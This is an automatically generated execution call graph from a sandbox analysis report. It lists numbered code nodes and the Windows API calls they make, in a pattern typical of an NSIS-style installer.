                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:20.6%
                                                                                  Total number of Nodes:1523
                                                                                  Total number of Limit Nodes:39
                                                                                  execution_graph 4182 402fc0 4183 401446 18 API calls 4182->4183 4184 402fc7 4183->4184 4185 403017 4184->4185 4186 40300a 4184->4186 4189 401a13 4184->4189 4187 406805 18 API calls 4185->4187 4188 401446 18 API calls 4186->4188 4187->4189 4188->4189 4190 4023c1 4191 40145c 18 API calls 4190->4191 4192 4023c8 4191->4192 4195 40726a 4192->4195 4198 406ed2 CreateFileW 4195->4198 4199 406f04 4198->4199 4200 406f1e ReadFile 4198->4200 4201 4062a3 11 API calls 4199->4201 4202 4023d6 4200->4202 4205 406f84 4200->4205 4201->4202 4203 4071e3 CloseHandle 4203->4202 4204 406f9b ReadFile lstrcpynA lstrcmpA 4204->4205 4206 406fe2 SetFilePointer ReadFile 4204->4206 4205->4202 4205->4203 4205->4204 4209 406fdd 4205->4209 4206->4203 4207 4070a8 ReadFile 4206->4207 4208 407138 4207->4208 4208->4207 4208->4209 4210 40715f SetFilePointer GlobalAlloc ReadFile 4208->4210 4209->4203 4211 4071a3 4210->4211 4212 4071bf lstrcpynW GlobalFree 4210->4212 4211->4211 4211->4212 4212->4203 4213 401cc3 4214 40145c 18 API calls 4213->4214 4215 401cca lstrlenW 4214->4215 4216 4030dc 4215->4216 4217 4030e3 4216->4217 4219 405f51 wsprintfW 4216->4219 4219->4217 4234 401c46 4235 40145c 18 API calls 4234->4235 4236 401c4c 4235->4236 4237 4062a3 11 API calls 4236->4237 4238 401c59 4237->4238 4239 406c9b 81 API calls 4238->4239 4240 401c64 4239->4240 4241 403049 4242 401446 18 API calls 4241->4242 4245 403050 4242->4245 4243 406805 18 API calls 4244 401a13 4243->4244 4245->4243 4245->4244 4246 40204a 4247 401446 18 API calls 4246->4247 4248 402051 IsWindow 4247->4248 4249 4018d3 4248->4249 4250 40324c 4251 403277 4250->4251 4252 40325e SetTimer 4250->4252 4253 4032cc 4251->4253 4254 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4251->4254 4252->4251 4254->4253 4255 4048cc 4256 4048f1 4255->4256 4257 4048da 4255->4257 4259 4048ff IsWindowVisible 4256->4259 4263 404916 4256->4263 4258 4048e0 4257->4258 4273 40495a 4257->4273 4260 403daf SendMessageW 4258->4260 4262 40490c 4259->4262 4259->4273 4264 4048ea 4260->4264 4261 404960 CallWindowProcW 4261->4264 4274 40484e SendMessageW 4262->4274 4263->4261 4279 406009 lstrcpynW 4263->4279 4267 404945 4280 405f51 wsprintfW 4267->4280 4269 40494c 4270 40141d 80 API calls 4269->4270 4271 404953 4270->4271 4281 406009 lstrcpynW 4271->4281 4273->4261 4275 404871 GetMessagePos ScreenToClient SendMessageW 4274->4275 4276 4048ab SendMessageW 4274->4276 4277 4048a3 4275->4277 4278 4048a8 4275->4278 4276->4277 4277->4263 4278->4276 4279->4267 4280->4269 4281->4273 4282 4022cc 4283 40145c 18 API calls 4282->4283 4284 4022d3 4283->4284 4285 4062d5 2 API calls 4284->4285 4286 4022d9 4285->4286 4287 4022e8 4286->4287 4291 405f51 wsprintfW 4286->4291 4290 4030e3 4287->4290 4292 405f51 wsprintfW 4287->4292 4291->4287 4292->4290 4293 4050cd 4294 405295 4293->4294 4295 4050ee GetDlgItem GetDlgItem GetDlgItem 4293->4295 4296 4052c6 4294->4296 4297 40529e GetDlgItem CreateThread CloseHandle 4294->4297 4342 403d98 SendMessageW 4295->4342 4299 4052f4 4296->4299 4301 4052e0 ShowWindow ShowWindow 4296->4301 4302 405316 4296->4302 4297->4296 4303 405352 4299->4303 4305 405305 4299->4305 4306 40532b ShowWindow 4299->4306 4300 405162 4313 406805 18 API calls 4300->4313 4347 403d98 SendMessageW 4301->4347 4351 403dca 4302->4351 4303->4302 4308 40535d SendMessageW 4303->4308 4348 403d18 4305->4348 4311 40534b 4306->4311 4312 40533d 4306->4312 4310 40528e 4308->4310 4315 405376 CreatePopupMenu 4308->4315 4314 403d18 SendMessageW 4311->4314 4316 404f72 25 API calls 4312->4316 4317 405181 4313->4317 4314->4303 4318 406805 18 API calls 4315->4318 4316->4311 4319 4062a3 11 API calls 4317->4319 4321 405386 AppendMenuW 4318->4321 4320 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4319->4320 4322 4051f3 4320->4322 4323 4051d7 SendMessageW SendMessageW 4320->4323 4324 405399 GetWindowRect 4321->4324 4325 4053ac 4321->4325 4326 405206 4322->4326 4327 4051f8 SendMessageW 4322->4327 4323->4322 4328 4053b3 TrackPopupMenu 4324->4328 4325->4328 4343 403d3f 4326->4343 4327->4326 4328->4310 4330 4053d1 4328->4330 4332 4053ed SendMessageW 4330->4332 4331 405216 4333 405253 GetDlgItem SendMessageW 4331->4333 4334 40521f ShowWindow 4331->4334 4332->4332 4335 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4332->4335 4333->4310 4338 405276 SendMessageW SendMessageW 4333->4338 4336 405242 4334->4336 4337 405235 ShowWindow 4334->4337 4339 40542f SendMessageW 4335->4339 4346 403d98 SendMessageW 4336->4346 4337->4336 4338->4310 4339->4339 4340 40545a GlobalUnlock SetClipboardData CloseClipboard 4339->4340 4340->4310 4342->4300 4344 406805 18 API calls 4343->4344 4345 403d4a SetDlgItemTextW 4344->4345 4345->4331 4346->4333 4347->4299 4349 403d25 SendMessageW 4348->4349 4350 403d1f 4348->4350 4349->4302 4350->4349 4352 403ddf GetWindowLongW 4351->4352 4362 403e68 4351->4362 4353 403df0 4352->4353 4352->4362 4354 403e02 4353->4354 4355 403dff GetSysColor 4353->4355 4356 403e12 SetBkMode 4354->4356 4357 403e08 SetTextColor 4354->4357 4355->4354 4358 403e30 4356->4358 4359 403e2a GetSysColor 4356->4359 4357->4356 4360 403e41 4358->4360 4361 403e37 SetBkColor 4358->4361 4359->4358 4360->4362 4363 403e54 DeleteObject 4360->4363 4364 403e5b CreateBrushIndirect 4360->4364 4361->4360 4362->4310 4363->4364 4364->4362 4365 4030cf 4366 40145c 18 API calls 4365->4366 4367 4030d6 4366->4367 4369 4030dc 4367->4369 4372 4063ac GlobalAlloc lstrlenW 4367->4372 4370 4030e3 4369->4370 4399 405f51 wsprintfW 4369->4399 4373 4063e2 4372->4373 4374 406434 4372->4374 4375 40640f GetVersionExW 4373->4375 4400 40602b CharUpperW 4373->4400 4374->4369 4375->4374 4376 40643e 4375->4376 4377 406464 LoadLibraryA 4376->4377 4378 40644d 4376->4378 4377->4374 4381 406482 GetProcAddress GetProcAddress GetProcAddress 4377->4381 4378->4374 4380 406585 GlobalFree 4378->4380 4382 40659b LoadLibraryA 4380->4382 4383 4066dd FreeLibrary 4380->4383 4386 4064aa 4381->4386 4389 4065f5 4381->4389 4382->4374 4385 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4382->4385 4383->4374 4384 406651 FreeLibrary 4393 40662a 4384->4393 4385->4389 4387 4064ce FreeLibrary GlobalFree 4386->4387 4386->4389 4395 4064ea 4386->4395 4387->4374 4388 4066ea 4391 4066ef CloseHandle FreeLibrary 4388->4391 4389->4384 4389->4393 4390 4064fc lstrcpyW OpenProcess 4392 40654f CloseHandle CharUpperW lstrcmpW 4390->4392 4390->4395 4394 406704 CloseHandle 4391->4394 4392->4389 4392->4395 4393->4388 4396 406685 lstrcmpW 4393->4396 4397 4066b6 CloseHandle 4393->4397 4398 4066d4 CloseHandle 4393->4398 4394->4391 4395->4380 4395->4390 4395->4392 4396->4393 4396->4394 4397->4393 4398->4383 4399->4370 4400->4373 4401 407752 4405 407344 4401->4405 4402 407c6d 4403 4073c2 GlobalFree 4404 4073cb GlobalAlloc 4403->4404 4404->4402 4404->4405 4405->4402 4405->4403 4405->4404 4405->4405 4406 407443 GlobalAlloc 4405->4406 4407 40743a GlobalFree 4405->4407 4406->4402 4406->4405 4407->4406 4408 401dd3 4409 401446 18 API calls 4408->4409 4410 401dda 4409->4410 4411 401446 18 API calls 4410->4411 4412 4018d3 4411->4412 4420 402e55 4421 40145c 18 API calls 4420->4421 4422 402e63 4421->4422 4423 402e79 4422->4423 4424 40145c 18 API calls 4422->4424 4425 405e30 2 API calls 4423->4425 4424->4423 4426 402e7f 4425->4426 4450 405e50 GetFileAttributesW CreateFileW 4426->4450 4428 402e8c 4429 402f35 4428->4429 4430 402e98 GlobalAlloc 4428->4430 4433 4062a3 11 API calls 4429->4433 4431 402eb1 4430->4431 4432 402f2c CloseHandle 4430->4432 4451 403368 SetFilePointer 4431->4451 4432->4429 4435 402f45 4433->4435 4437 402f50 DeleteFileW 4435->4437 4438 402f63 4435->4438 4436 402eb7 4440 403336 ReadFile 4436->4440 4437->4438 4452 401435 4438->4452 4441 402ec0 GlobalAlloc 4440->4441 4442 402ed0 4441->4442 4443 402f04 WriteFile GlobalFree 4441->4443 4444 40337f 37 API calls 4442->4444 4445 40337f 37 API calls 4443->4445 4449 402edd 4444->4449 4446 402f29 4445->4446 4446->4432 4448 402efb GlobalFree 4448->4443 4449->4448 4450->4428 4451->4436 4453 404f72 25 API calls 4452->4453 4454 401443 4453->4454 4455 401cd5 4456 401446 18 API calls 4455->4456 4457 401cdd 4456->4457 4458 401446 18 API calls 4457->4458 4459 401ce8 4458->4459 4460 40145c 18 API calls 4459->4460 4461 401cf1 4460->4461 4462 401d07 lstrlenW 4461->4462 4463 401d43 4461->4463 4464 401d11 4462->4464 4464->4463 4468 406009 lstrcpynW 4464->4468 4466 401d2c 4466->4463 4467 401d39 lstrlenW 4466->4467 4467->4463 4468->4466 4469 403cd6 4470 403ce1 4469->4470 4471 403ce5 4470->4471 4472 403ce8 GlobalAlloc 4470->4472 4472->4471 4473 402cd7 4474 401446 18 API calls 4473->4474 4477 402c64 4474->4477 4475 402d99 4476 402d17 ReadFile 4476->4477 4477->4473 4477->4475 4477->4476 4478 402dd8 4479 402ddf 4478->4479 4480 4030e3 4478->4480 4481 402de5 FindClose 4479->4481 4481->4480 4482 401d5c 4483 40145c 18 API calls 4482->4483 4484 401d63 4483->4484 4485 40145c 18 API calls 4484->4485 4486 401d6c 4485->4486 4487 401d73 lstrcmpiW 4486->4487 4488 401d86 lstrcmpW 4486->4488 4489 401d79 4487->4489 4488->4489 4490 401c99 4488->4490 4489->4488 4489->4490 4120 407c5f 4121 407344 4120->4121 4122 4073c2 GlobalFree 4121->4122 4123 4073cb GlobalAlloc 4121->4123 4124 407c6d 4121->4124 4125 407443 GlobalAlloc 4121->4125 4126 40743a GlobalFree 4121->4126 4122->4123 4123->4121 4123->4124 4125->4121 4125->4124 4126->4125 4491 404363 4492 404373 4491->4492 4493 40439c 4491->4493 4495 403d3f 19 API calls 4492->4495 4494 403dca 8 API calls 4493->4494 4496 4043a8 4494->4496 4497 404380 SetDlgItemTextW 4495->4497 4497->4493 4498 4027e3 4499 4027e9 4498->4499 4500 4027f2 4499->4500 4501 402836 4499->4501 4514 401553 4500->4514 4502 40145c 18 API calls 4501->4502 4504 40283d 4502->4504 4506 4062a3 11 API calls 4504->4506 4505 4027f9 4507 40145c 18 API calls 4505->4507 4512 401a13 4505->4512 4508 40284d 4506->4508 4509 40280a RegDeleteValueW 4507->4509 4518 40149d RegOpenKeyExW 4508->4518 4510 4062a3 11 API calls 4509->4510 4513 40282a RegCloseKey 4510->4513 4513->4512 4515 401563 4514->4515 4516 40145c 18 API calls 4515->4516 4517 401589 RegOpenKeyExW 4516->4517 4517->4505 4524 401515 4518->4524 4526 4014c9 4518->4526 4519 4014ef RegEnumKeyW 4520 401501 RegCloseKey 4519->4520 4519->4526 4521 4062fc 3 API calls 4520->4521 4523 401511 4521->4523 4522 401526 RegCloseKey 4522->4524 4523->4524 4527 401541 RegDeleteKeyW 4523->4527 4524->4512 4525 40149d 3 API calls 4525->4526 4526->4519 4526->4520 4526->4522 4526->4525 4527->4524 4528 403f64 4529 403f90 4528->4529 4530 403f74 4528->4530 4532 403fc3 4529->4532 4533 403f96 SHGetPathFromIDListW 4529->4533 4539 405c84 GetDlgItemTextW 4530->4539 4535 403fad SendMessageW 4533->4535 4536 403fa6 4533->4536 4534 403f81 SendMessageW 4534->4529 4535->4532 4537 40141d 80 API calls 4536->4537 4537->4535 4539->4534 4540 402ae4 4541 402aeb 4540->4541 4542 4030e3 4540->4542 4543 402af2 CloseHandle 4541->4543 4543->4542 4544 402065 4545 401446 18 API calls 4544->4545 4546 40206d 4545->4546 4547 401446 18 API calls 4546->4547 4548 402076 GetDlgItem 4547->4548 4549 4030dc 4548->4549 4550 4030e3 4549->4550 4552 405f51 wsprintfW 4549->4552 4552->4550 4553 402665 4554 40145c 18 API calls 4553->4554 4555 40266b 4554->4555 4556 40145c 18 API calls 4555->4556 4557 402674 4556->4557 4558 40145c 18 API calls 4557->4558 4559 40267d 4558->4559 4560 4062a3 11 API calls 4559->4560 4561 40268c 4560->4561 4562 4062d5 2 API calls 4561->4562 4563 402695 4562->4563 4564 4026a6 lstrlenW lstrlenW 4563->4564 4565 404f72 25 API calls 4563->4565 4568 4030e3 4563->4568 4566 404f72 25 API calls 4564->4566 4565->4563 4567 4026e8 SHFileOperationW 4566->4567 4567->4563 4567->4568 4576 401c69 4577 40145c 18 API calls 4576->4577 4578 401c70 4577->4578 4579 4062a3 11 API calls 4578->4579 4580 401c80 4579->4580 4581 405ca0 MessageBoxIndirectW 4580->4581 4582 401a13 4581->4582 4590 402f6e 4591 402f72 4590->4591 4592 402fae 4590->4592 4593 4062a3 11 API calls 4591->4593 4594 40145c 18 API calls 4592->4594 4595 402f7d 4593->4595 4600 402f9d 4594->4600 4596 4062a3 11 API calls 4595->4596 4597 402f90 4596->4597 4598 402fa2 4597->4598 4599 402f98 4597->4599 4602 4060e7 9 API calls 4598->4602 4601 403e74 5 API calls 4599->4601 4601->4600 4602->4600 4603 4023f0 4604 402403 4603->4604 4605 4024da 4603->4605 4606 40145c 18 API calls 4604->4606 4607 404f72 25 API calls 4605->4607 4608 40240a 4606->4608 4613 4024f1 4607->4613 4609 40145c 18 API calls 4608->4609 4610 402413 4609->4610 4611 402429 LoadLibraryExW 4610->4611 4612 40241b GetModuleHandleW 4610->4612 4614 40243e 4611->4614 4615 4024ce 4611->4615 4612->4611 4612->4614 4627 406365 GlobalAlloc WideCharToMultiByte 4614->4627 4616 404f72 25 API calls 4615->4616 4616->4605 4618 402449 4619 40248c 4618->4619 4620 40244f 4618->4620 4621 404f72 25 API calls 4619->4621 4623 401435 25 API calls 4620->4623 4625 40245f 4620->4625 4622 402496 4621->4622 4624 4062a3 11 API calls 4622->4624 4623->4625 4624->4625 4625->4613 4626 4024c0 FreeLibrary 4625->4626 4626->4613 4628 406390 GetProcAddress 4627->4628 4629 40639d GlobalFree 4627->4629 4628->4629 4629->4618 4630 402df3 4631 402dfa 4630->4631 4633 4019ec 4630->4633 4632 402e07 FindNextFileW 4631->4632 4632->4633 4634 402e16 4632->4634 4636 406009 lstrcpynW 4634->4636 4636->4633 4637 402175 4638 401446 18 API calls 4637->4638 4639 40217c 4638->4639 4640 401446 18 API calls 4639->4640 4641 402186 4640->4641 4642 4062a3 11 API calls 4641->4642 4646 402197 4641->4646 4642->4646 4643 4021aa EnableWindow 4645 4030e3 4643->4645 4644 40219f ShowWindow 4644->4645 4646->4643 4646->4644 4654 404077 4655 404081 4654->4655 4656 404084 lstrcpynW lstrlenW 4654->4656 4655->4656 4657 405479 4658 405491 4657->4658 4659 4055cd 4657->4659 4658->4659 4660 40549d 4658->4660 4661 40561e 4659->4661 4662 4055de GetDlgItem GetDlgItem 4659->4662 4663 4054a8 SetWindowPos 4660->4663 4664 4054bb 4660->4664 4666 405678 4661->4666 4674 40139d 80 API calls 4661->4674 4665 403d3f 19 API calls 4662->4665 4663->4664 4668 4054c0 ShowWindow 4664->4668 4669 4054d8 4664->4669 4670 405608 SetClassLongW 4665->4670 4667 403daf SendMessageW 4666->4667 4687 4055c8 4666->4687 4696 40568a 4667->4696 4668->4669 4671 4054e0 DestroyWindow 4669->4671 4672 4054fa 4669->4672 4673 40141d 80 API calls 4670->4673 4724 4058dc 4671->4724 4675 405510 4672->4675 4676 4054ff SetWindowLongW 4672->4676 4673->4661 4677 405650 4674->4677 4680 405587 4675->4680 4681 40551c GetDlgItem 4675->4681 4676->4687 4677->4666 4682 405654 SendMessageW 4677->4682 4678 40141d 80 API calls 4678->4696 4679 4058de DestroyWindow EndDialog 4679->4724 4683 403dca 8 API calls 4680->4683 4685 40554c 4681->4685 4686 40552f SendMessageW IsWindowEnabled 4681->4686 4682->4687 4683->4687 4684 40590d ShowWindow 4684->4687 4689 405559 4685->4689 4690 4055a0 SendMessageW 4685->4690 4691 40556c 4685->4691 4699 405551 4685->4699 4686->4685 4686->4687 4688 406805 18 API calls 4688->4696 4689->4690 4689->4699 4690->4680 4694 405574 4691->4694 4695 405589 4691->4695 4692 403d18 SendMessageW 4692->4680 4693 403d3f 19 API calls 4693->4696 4697 40141d 80 API calls 4694->4697 4698 40141d 80 API calls 4695->4698 4696->4678 4696->4679 4696->4687 4696->4688 4696->4693 4700 403d3f 19 API calls 4696->4700 4715 40581e DestroyWindow 4696->4715 4697->4699 4698->4699 4699->4680 4699->4692 4701 405705 GetDlgItem 4700->4701 4702 405723 ShowWindow EnableWindow 4701->4702 4703 40571a 4701->4703 4725 403d85 EnableWindow 4702->4725 4703->4702 4705 40574d EnableWindow 4708 405761 4705->4708 4706 405766 GetSystemMenu EnableMenuItem SendMessageW 4707 405796 SendMessageW 4706->4707 4706->4708 4707->4708 4708->4706 4726 403d98 SendMessageW 4708->4726 4727 406009 lstrcpynW 4708->4727 4711 4057c4 lstrlenW 4712 406805 18 API calls 4711->4712 4713 4057da SetWindowTextW 4712->4713 4714 40139d 80 API calls 4713->4714 4714->4696 4716 405838 CreateDialogParamW 4715->4716 4715->4724 4717 40586b 4716->4717 4716->4724 4718 403d3f 19 API calls 4717->4718 4719 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4718->4719 4720 40139d 80 API calls 4719->4720 4721 4058bc 4720->4721 4721->4687 4722 4058c4 ShowWindow 4721->4722 4723 403daf SendMessageW 4722->4723 4723->4724 4724->4684 4724->4687 4725->4705 4726->4708 4727->4711 4728 4020f9 GetDC GetDeviceCaps 4729 401446 18 API calls 4728->4729 4730 402116 MulDiv 4729->4730 4731 401446 18 API calls 4730->4731 4732 40212c 4731->4732 4733 406805 18 API calls 4732->4733 4734 402165 CreateFontIndirectW 4733->4734 4735 4030dc 4734->4735 4736 4030e3 4735->4736 4738 405f51 wsprintfW 4735->4738 4738->4736 4739 4024fb 4740 40145c 18 API calls 4739->4740 4741 402502 4740->4741 4742 40145c 18 API calls 4741->4742 4743 40250c 4742->4743 4744 40145c 18 API calls 4743->4744 4745 402515 4744->4745 4746 40145c 18 API calls 4745->4746 4747 40251f 4746->4747 4748 40145c 18 API calls 4747->4748 4749 402529 4748->4749 4750 40253d 4749->4750 4751 40145c 18 API calls 4749->4751 4752 4062a3 11 API calls 4750->4752 4751->4750 4753 40256a CoCreateInstance 4752->4753 4754 40258c 4753->4754 4755 40497c GetDlgItem GetDlgItem 4756 4049d2 7 API calls 4755->4756 4761 404bea 4755->4761 4757 404a76 DeleteObject 4756->4757 4758 404a6a SendMessageW 4756->4758 4759 404a81 4757->4759 4758->4757 4762 404ab8 4759->4762 4764 406805 18 API calls 4759->4764 4760 404ccf 4763 404d74 4760->4763 4768 404bdd 4760->4768 4773 404d1e SendMessageW 4760->4773 4761->4760 4771 40484e 5 API calls 4761->4771 4784 404c5a 4761->4784 4767 403d3f 19 API calls 4762->4767 4765 404d89 4763->4765 4766 404d7d SendMessageW 4763->4766 4770 404a9a SendMessageW SendMessageW 4764->4770 4775 404da2 4765->4775 4776 404d9b ImageList_Destroy 4765->4776 4786 404db2 4765->4786 4766->4765 4772 404acc 4767->4772 4774 403dca 8 API calls 4768->4774 4769 404cc1 SendMessageW 4769->4760 4770->4759 4771->4784 4777 403d3f 19 API calls 4772->4777 4773->4768 4779 404d33 SendMessageW 4773->4779 4780 404f6b 4774->4780 4781 404dab GlobalFree 4775->4781 4775->4786 4776->4775 4782 404add 4777->4782 4778 404f1c 4778->4768 4787 404f31 ShowWindow GetDlgItem ShowWindow 4778->4787 4783 404d46 4779->4783 4781->4786 4785 404baa GetWindowLongW SetWindowLongW 4782->4785 4794 404ba4 4782->4794 4797 404b39 SendMessageW 4782->4797 4798 404b67 SendMessageW 4782->4798 4799 404b7b SendMessageW 4782->4799 4793 404d57 SendMessageW 4783->4793 4784->4760 4784->4769 4788 404bc4 4785->4788 4786->4778 4789 404de4 4786->4789 4792 40141d 80 API calls 4786->4792 4787->4768 4790 404be2 4788->4790 4791 404bca ShowWindow 4788->4791 4802 404e12 SendMessageW 4789->4802 4805 404e28 4789->4805 4807 403d98 SendMessageW 4790->4807 4806 403d98 SendMessageW 4791->4806 4792->4789 4793->4763 4794->4785 4794->4788 4797->4782 4798->4782 4799->4782 4800 404ef3 InvalidateRect 4800->4778 4801 404f09 4800->4801 4808 4043ad 4801->4808 4802->4805 4804 404ea1 SendMessageW SendMessageW 4804->4805 4805->4800 4805->4804 4806->4768 4807->4761 4809 4043cd 4808->4809 4810 406805 18 API calls 4809->4810 4811 40440d 4810->4811 4812 406805 18 API calls 4811->4812 4813 404418 4812->4813 4814 406805 18 API calls 4813->4814 4815 404428 lstrlenW wsprintfW SetDlgItemTextW 4814->4815 4815->4778 4816 4026fc 4817 401ee4 4816->4817 4819 402708 4816->4819 4817->4816 4818 406805 18 API calls 4817->4818 4818->4817 4820 4019fd 4821 40145c 18 API calls 4820->4821 4822 401a04 4821->4822 4823 405e7f 2 API calls 4822->4823 4824 401a0b 4823->4824 4825 4022fd 4826 40145c 18 API calls 4825->4826 4827 402304 GetFileVersionInfoSizeW 4826->4827 4828 40232b GlobalAlloc 4827->4828 4832 4030e3 4827->4832 4829 40233f GetFileVersionInfoW 4828->4829 4828->4832 4830 402350 VerQueryValueW 4829->4830 4831 402381 GlobalFree 4829->4831 4830->4831 4834 402369 4830->4834 4831->4832 4838 405f51 wsprintfW 4834->4838 4836 402375 4839 405f51 wsprintfW 4836->4839 4838->4836 4839->4831 4840 402afd 4841 40145c 18 API calls 4840->4841 4842 402b04 4841->4842 4847 405e50 GetFileAttributesW CreateFileW 4842->4847 4844 402b10 4845 4030e3 4844->4845 4848 405f51 wsprintfW 4844->4848 4847->4844 4848->4845 4849 4029ff 4850 401553 19 API calls 4849->4850 4851 402a09 4850->4851 4852 40145c 18 API calls 4851->4852 4853 402a12 4852->4853 4854 402a1f RegQueryValueExW 4853->4854 4856 401a13 4853->4856 4855 402a3f 4854->4855 4859 402a45 4854->4859 4855->4859 4860 405f51 wsprintfW 4855->4860 4858 4029e4 RegCloseKey 4858->4856 4859->4856 4859->4858 4860->4859 4861 401000 4862 401037 BeginPaint GetClientRect 4861->4862 4863 40100c DefWindowProcW 4861->4863 4865 4010fc 4862->4865 4866 401182 4863->4866 4867 401073 CreateBrushIndirect FillRect DeleteObject 4865->4867 4868 401105 4865->4868 4867->4865 4869 401170 EndPaint 4868->4869 4870 40110b CreateFontIndirectW 4868->4870 4869->4866 4870->4869 4871 40111b 6 API calls 4870->4871 4871->4869 4872 401f80 4873 401446 18 API calls 4872->4873 4874 401f88 4873->4874 4875 401446 18 API calls 4874->4875 4876 401f93 4875->4876 4877 401fa3 4876->4877 4878 40145c 18 API calls 4876->4878 4879 401fb3 4877->4879 4880 40145c 18 API calls 4877->4880 4878->4877 4881 402006 4879->4881 4882 401fbc 4879->4882 4880->4879 4884 40145c 18 API calls 4881->4884 4883 401446 18 API calls 4882->4883 4886 401fc4 4883->4886 4885 40200d 4884->4885 4887 40145c 18 API calls 4885->4887 4888 401446 18 API calls 4886->4888 4889 402016 FindWindowExW 4887->4889 4890 401fce 4888->4890 4894 402036 4889->4894 4891 401ff6 SendMessageW 4890->4891 4892 401fd8 SendMessageTimeoutW 4890->4892 4891->4894 4892->4894 4893 4030e3 4894->4893 4896 405f51 wsprintfW 4894->4896 4896->4893 4897 402880 4898 402884 4897->4898 4899 40145c 18 API calls 4898->4899 4900 4028a7 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028b1 4901->4902 4903 4028ba RegCreateKeyExW 4902->4903 4904 4028e8 4903->4904 4911 4029ef 4903->4911 4905 402934 4904->4905 4906 40145c 18 API calls 4904->4906 4907 402963 4905->4907 4910 401446 18 API calls 4905->4910 4909 4028fc lstrlenW 4906->4909 4908 4029ae RegSetValueExW 4907->4908 4912 40337f 37 API calls 4907->4912 4915 4029c6 RegCloseKey 4908->4915 4916 4029cb 4908->4916 4913 402918 4909->4913 4914 40292a 4909->4914 4917 402947 4910->4917 4918 40297b 4912->4918 4919 4062a3 11 API calls 4913->4919 4920 4062a3 11 API calls 4914->4920 4915->4911 4921 4062a3 11 API calls 4916->4921 4922 4062a3 11 API calls 4917->4922 4928 406224 4918->4928 4924 402922 4919->4924 4920->4905 4921->4915 4922->4907 4924->4908 4927 4062a3 11 API calls 4927->4924 4929 406247 4928->4929 4930 40628a 4929->4930 4931 40625c wsprintfW 4929->4931 4932 402991 4930->4932 4933 406293 lstrcatW 4930->4933 4931->4930 4931->4931 4932->4927 4933->4932 4934 402082 4935 401446 18 API calls 4934->4935 4936 402093 SetWindowLongW 4935->4936 4937 4030e3 4936->4937 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 